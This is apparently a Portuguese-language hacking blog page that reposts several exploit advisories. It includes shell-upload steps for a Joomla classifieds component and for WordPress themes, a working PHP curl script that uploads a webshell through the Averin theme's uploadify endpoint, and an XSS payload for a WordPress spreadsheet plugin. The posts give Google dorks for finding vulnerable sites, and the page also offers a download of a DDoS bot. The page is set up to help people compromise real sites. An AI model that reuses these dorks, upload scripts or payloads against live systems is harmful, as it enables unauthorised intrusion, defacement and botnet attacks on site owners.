Pular para o conteúdo principal

Postagens

Joomla com_aclassfb File Upload Vulnerability

#Title : Joomla com_aclassfb File Upload Vulnerability #Author : DevilScreaM #Category : Web Applications #Vendor : http://www.almondsoft.com #Type : PHP #Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber #Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded | #Tested : Mozila, Chrome, Opera -> Windows & Linux #Vulnerabillity : File Upload #Dork : inurl:com_aclassfb File Upload http://127.0.0.1/index.php?option=com_aclassfb Exploit : http://127.0.0.1/index.php?option=com_aclassfb&Itemid= [ID]&ct=[CATEGORY]&md=add_form POC : 1. Select Category 2. After Select Category, Click “Post New Ad” http://127.0.0.1/index.php?option=com_aclassfb&Itemid= [ID]&ct=[CATEGORY]&md=add_form 3. Upload Your Shell extension : .php .php.jpg / etc Shell Access : http://127.0.0.1/component/com_aclassfb/photos/ Encontre sua shell.

WordPress DailyDeal Themes Shell Upload Vulnerabillity

#Title : WordPress DailyDeal Themes Shell Upload Vulnerabillity #Author : DevilScreaM #Vulnerabillity : Shell Upload #Dork : inurl:wp-content/themes/DailyDeal/ Exploit & POC http://site-target/wp-content/themes/DailyDeal/monetize/upload/ Resultado Upload http://site-target/wp-content/uploads/[years]/[months]/[Find_your_shell].php Exemplo : http://vulnsite.com/wp-content/themes/Da...ze/upload/ Clique em Procurar, e escolha o seu shell .. :)

Tutorial - Noções básicas de Footprinting

O que é isso ? Footprinting é o ato que é realizado para reunir informações sobre um sistema de computador. Este é o primeiro passo no processo de hacking ético. Isto irá permitir-nos aprender tudo possível sobre o sistema antes de avançar. Maneiras de coletar informações 1. As primeiras coisas para tentar encontrar seria e-mails e nomes no site de destino. Se um atacante deseja tentar realizar um ataque de engenharia social, então esta informação será muito útil. 2. O próximo passo é obter o endereço IP do site. Existe muitos sites que permitem que você insira uma URL do site e ele vai te mostrar o IP. Um site que eu costumo usar é :  http://www.yougetsignal.com/tools/web-sites-on-web-server/ Como você pode ver acima neste site também irá mostrar todos os outros sites no mesmo servidor web, porem nesse ip existe apenas 2. 3. O terceiro passo é fazer o ping do servidor para se certificar de que está ON. Usando um site como o http://cloudmonitor.ca.com/e...

Madness DDoS Bot 1.13

Baixar

Wordpress Averin Themes Arbitrary File Upload

#Title : Wordpress Averin Themes Arbitrary File Upload #Author : DevilScreaM #Vendor : http://themeforest.net/ #Link : http://themeforest.net/item/averin-premi...eme/388778 #Vulnerabillity : Arbitrary File Upload #Dork : inurl:wp-content/themes/averin/ Exploit and Script : <?php $uploadfile="devilscream.php"; $ch = curl_init("http://site-target/wp-content/themes/averin/js/uploadify/uploadify.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile", 'folder'=>'/wp-content/themes/averin/js/uploadify/')); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?>

NETRA - "Prism " Um sistema de espionagem Internet a ser lançado pelo Governo indiano

Pense duas vezes antes de usar palavras como "bomba", "explosão", "matar", "ataque" em seus e-mails, blogs, tweets, status no Facebook ou qualquer outra rede de atualizações de status social. Usando esse tipo de palavras vai colocá-lo sob uma vigilância das agências de segurança indianas. "NETRA", é um sistema de espionagem Internet, desenvolvido pelo Centro de Inteligência Artificial e Robótica (CAIR), um laboratório no âmbito da Investigação de Defesa e Organização de Desenvolvimento (DRDO), que é capaz de detectar mensagem fide mala, relata Times of India . Além estado atualização em redes sociais, o projeto NETRA é capaz de capturar todo o tráfego de voz duvidosa passando serviços de VOIP completas como o Skype ou o Google Talk. "Quando Netra é operacionalizada, agências de segurança vai ter um grande controle sobre as atividades de monitoramento de pessoas duvidosas e organizações que uso Internet para realizar seus pro...

Wordpress Spreadsheet Plugin Cross Site Scripting

Wordpress spreadsheet Plugin Cross site scripting #*******************************************************************************​* # Exploit Title : Wordpress spreadsheet Plugin Cross site scripting # # Exploit Author : Ashiyane Digital Security Team # # Vendor Homepage : http://wordpress.org # # Software Link : http://downloads.wordpress.org/plugin/dh...et.2.0.zip # # Google Dork : inurl :wp-content/plugins/dhtmlxspreadsheet # # Tested on: Windows 7 , Linux ------------------------------------------------------------------- # Exploit : Cross site scripting # # Location : [Target]/wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=[xss] # # Script For Test : <script>alert(1);</script> ###################### # Example: # # http://www.vulnsite.com/wp-content/plugi...(1);</script>